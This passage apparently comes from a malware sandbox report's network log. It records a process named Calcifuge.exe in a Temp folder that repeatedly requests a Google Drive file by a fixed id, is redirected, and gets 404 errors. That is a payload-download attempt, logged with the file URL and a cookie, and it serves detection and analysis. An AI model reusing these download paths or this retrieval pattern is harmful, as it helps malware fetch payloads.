                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:40 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-y1hjgZyHL2DExuSUYHqAzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:40 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dM43TfZ4Mf8GLYySxGhJfg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              10 | 192.168.2.4 | 53466 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:41 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:42 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:41 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-pHbeLvjkx3tC1toP_9Qifw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              11 | 192.168.2.4 | 53467 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:42 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:43 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgStLaXLA5F7jhOZoBjqve3Ri0jfMLb8sp5dm8vLPm9bhuQagsGQjc0H6Po-lVBYacKMvo6dypk
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:42 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-h03F0nUFcjZD2fa8L9J-CQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:43 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XNO3Lc0wvmnId6E2GWdgRQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              12 | 192.168.2.4 | 53468 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:43 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:44 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'nonce-FYCbSiJLrpNPnjNn_3VhyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              13 | 192.168.2.4 | 53469 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:45 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:45 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQla8hEoLIPGTXtf1KCnznk0msrobAKyzJL8Wc-EpU1Y38sm-fRc5Vr1DIQUcq6ISJ-
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:45 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-ehqt-zmHN5zrtQqTbCQ9hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:45 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="64GowcIFxCqtyYqKnusD6A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              14 | 192.168.2.4 | 53471 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:46 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:46 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8jKWHb7oxA5eFx9RrZFCOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              15 | 192.168.2.4 | 53477 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:47 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:47 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgR5zaczAEHKGYUdK-yO54xlSgj-yZBID855b95pOWM9xCHc13xYaF76dvWV_Y6KJrM7
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:47 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-76epgjJ0rDguqb2wlieR3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:47 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EA4TM0ymyYkPOAG7ILkmAw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              16 | 192.168.2.4 | 53484 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:48 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:49 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:48 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-lCkQhji9cuuutypmjYS4-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              17 | 192.168.2.4 | 53494 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:49 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:50 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgRuUbV_aVg_Sd2zOcCY5b2hf0QFmeJwt6IqUH4VPI8uH7bwDS9NzfL6XL2VUJV16PYG
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:49 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-fiMcf5HKxjiMN9Nm3BCX6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
